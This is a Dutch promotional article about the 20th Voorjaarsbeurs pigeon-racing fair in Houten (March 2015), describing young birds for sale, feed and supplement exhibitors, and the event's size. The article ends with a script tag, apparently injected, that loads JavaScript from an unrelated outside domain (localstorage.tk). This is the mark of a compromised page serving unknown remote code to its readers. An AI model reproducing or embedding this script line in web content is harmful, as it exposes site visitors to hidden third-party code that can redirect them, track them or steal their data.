Door: Colla Alberts

Wat is de aanstormende Lente zonder Voorjaarsbeurs...

Ook de aanstaande 20e (!!!!) Voorjaarsbeurs ligt op koers om op zaterdag 7 & zondag 8 maart 2015 weer tienduizenden liefhebbers en bezoekers te ontvangen uit alle Hemelse richtingen. Van Oost & West tot Zuid naar Noord, “half” Europa en ver daarbuiten rept zich naar deze beurs die de opmaat is voor het nu zeer snel naderende seizoen 2015. Dit immers is de ultieme kans om te profiteren van vaak spectaculaire beursaanbiedingen welke vele Exposanten presenteren, het is NU ook de periode waar duizenden Jonge Duiven worden aangeboden door een keur van liefhebbers die met veelal TOPMATERIAAL proberen hun ‘jonkies’ aan de Man of Vrouw te brengen. Naast Nederlandse Provinciale- & Nationale Winnaars treft u nu ook steeds meer Duitse Sportvrienden aan die, zoals we allen weten vaak op de Internationale Eenhoks- Races de boventoon voeren. Ook bij hen kunt u terecht voor Kwaliteit, het enige criterium dat voor een liefhebber primeert, wel geef uw ogen en oren goed de kost, wellicht dat Uw toekomstige vaandeldrager(s) van uw hok hier op u zit te wachten.

In het verleden immers werden Provinciale- & Nationale vluchten gewonnen door duiven die hier in Houten gekocht waren, het kan immers geen toeval zijn dat zeer veel aanbieders elk jaar aanwezig zijn, was de aangeboden kwaliteit immers niet goed genoeg geweest hadden zij allang het veld moeten ruimen, dat is immers de knalharde ‘marktwerking’ die ook opgeld doet in onze sport.
Daarnaast een reeks van Fabrikanten welke hun diverse duivenmengelingen presenteren, supplementen allerhande want de betere liefhebbers weten het al vele jaren, onze duiven zijn Topatleten welke ook als zodanig verzorgd willen worden. Zowel traditioneel of geheel nieuw, u vindt een keur aan exposanten met veel voedingssupplementen die klaar staan om u van een uitstekend advies en dito producten te voorzien, profiteer van hun kennis en ervaring, het loont altijd de moeite een praatje met hen te maken.

Met liefst 250 Exposanten in de prachtige Hallen van Euretco te Houten is het ondoenlijk om over de beursvloer re racen, neem de tijd want u kunt op tijd en stond gewoon op een van de sfeervolle terrassen uw benen strekken, een kopje koffie of thee of iets anders tot u nemen. Op geen enkele duivenbeurs in de hele wereld vindt u 250 exposanten, in 20 jaar immers heeft Organisator Pieter Kos een Beurs met Naam & Faam opgebouwd, het is juist deze Uitstraling die elk jaar borg staat voor fijn duivenplezier maar ook hernieuwde kennismaking met gelijkgestemden, even binnen te lopen en info op te pikken, hier is, zoals al aangehaald de ultieme kans om als Liefhebber het best mogelijke voor uw duiven te verkrijgen, vandaag immers zijn op zelfs marathonvluchten als Barcelona in enkele uren tijd alle prijzen uitgedeeld, met duiven welke niet in vorm zijn en op de juiste manier zijn gesoigneerd lukt het niet meer. Gebruik dus opnieuw deze beurs zoals u ook al deed in voorgaande 19 jaren, profiteer van de kennis van anderen om er zelf beter van te worden. Onder Het Motto:
Ontmoeten & kennis vergaren, door gerichte aankopen uw beurs sparen..

Dát is wat de Voorjaarsbeurs tot …. De Voorjaarsbeurs maakt…!!
<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>